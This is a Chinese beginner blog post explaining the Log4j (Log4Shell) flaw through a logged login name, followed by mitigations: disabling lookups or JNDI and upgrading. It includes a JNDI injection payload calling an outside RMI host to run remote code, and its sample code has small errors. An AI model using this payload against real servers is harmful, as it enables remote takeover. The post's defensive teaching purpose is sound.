log4j漏洞的产生原因和解决方案,小白都能看懂!!!!
核弹级bug Log4j,相信很多人都有所耳闻了,这两天很多读者都在问我关于这个bug的原理等一些问题,今天咱们就专门写一篇文章,一起聊一聊这个核弹级别的bug的产生原理以及怎么防止 
产生原因
其实这个主要的原因,和日志有关,日志是应用软件中不可缺少的部分,Apache的开源项目log4j是一个功能强大的日志组件,提供方便的日志记录。
最简单的日志打印
我们看如下场景: 这个场景大家应该很熟悉了,就是用户登录,咱们今天不用关心登录是怎么实现的,只用关心用户名name字段就可以了,代码如下
public void login(string name){
String name = "test"; //表单接收name字段
logger.info("{},登录了", name); //logger为log4j
}
很简单,用户如果登陆了,我们通过表单接收到相关name字段,然后在日志中记录上这么一条记录。
这个看起来是很常规的操作了,记录日志为什么会导致bug呢?不要着急,我们接下来往下看。
lookup支持打印系统变量
name变量是用户输入的,用户输入什么都可以,上面的例子是字符串test,那么用户可以输入别的内容么?
public void login(string name){
String name = "{$java:os}"; //用户输入的name内容为 {$java:os}
logger.info("{},登录了", name); //logger为log4j
}
如果用户在用户名输入框输入{$java:os},那么日志中记录的会是系统相关的信息,上述代码会输出
Windows 7 6.1 Service Pack 1, architecture: amd64-64,登录了
为什么会产生这种奇怪的现象呢?
是因为log4j提供了一个lookup的功能,对lookup功能不熟悉的同学也没有关系,你知道有这么个方法,可以把一些系统变量放到日志中就可以了,如下图
比较敏锐的同学可能已经开始察觉到了,现在越来越像sql注入了。
JNDI介绍
很多同学可能对JNDI不是很了解,不过没关系,我用最通俗的话来解释 其实就是你自己做一个服务,比如是
jndi:rmi:192.168.9.23:1099/remote
如果被攻击的服务器,比如某台线上的服务器,访问了或者执行了,你自己的JNDI服务,「那么线上的服务器就会来执行JNDI服务中的remote方法的代码」。如果不是很清楚,没关系,下面有张图
大家还记得我们今天的主角log4j么? 如果用户直接在用户名输入框输入JNDI的服务地址
public void login(string name){
String name = "${jndi:rmi:192.168.9.23:1099/remote}"; //用户输入的name内容为 jndi相关信息
logger.info("{},登录了", name);
}
那么只要是你用log4j来打印这么一条日志,那么log4j就会去执行 jndi:rmi:192.168.9.23:1099/remote 服务,那么在黑客的电脑上就可以对线上服务做任何操作了,
大家想象一下,一个不是你公司的人,却可以在你们公司线上服务器做任何操作,这该是多么的可怕。
解决方式
其实如果你了解了这个原理那么解决方式也就一目了然了,
禁用lookup或JNDI服务
罪魁祸首就是lookup和JNDI,那么直接修改配置文件log4j2.formatMsgNoLookups=True或禁用JNDI服务,不过一般产生问题的服务都是线上已经在跑的服务,禁用的时候要注意评估一下是否允许。
升级Apache Log4j
这次产生的影响范围主要是在Apache Log4j 2.x <= 2.14.1 ,所以直接把Log4j升级即可解决。
作者:程序员小饭
来源链接:https://www.cnblogs.com/xuehao/p/15684159.html
版权声明:
1、JavaClub(https://www.javaclub.cn)以学习交流为目的,由作者投稿、网友推荐和小编整理收藏优秀的IT技术及相关内容,包括但不限于文字、图片、音频、视频、软件、程序等,其均来自互联网,本站不享有版权,版权归原作者所有。
2、本站提供的内容仅用于个人学习、研究或欣赏,以及其他非商业性或非盈利性用途,但同时应遵守著作权法及其他相关法律的规定,不得侵犯相关权利人及本网站的合法权利。
3、本网站内容原作者如不愿意在本网站刊登内容,请及时通知本站(javaclubcn@163.com),我们将第一时间核实后及时予以删除。
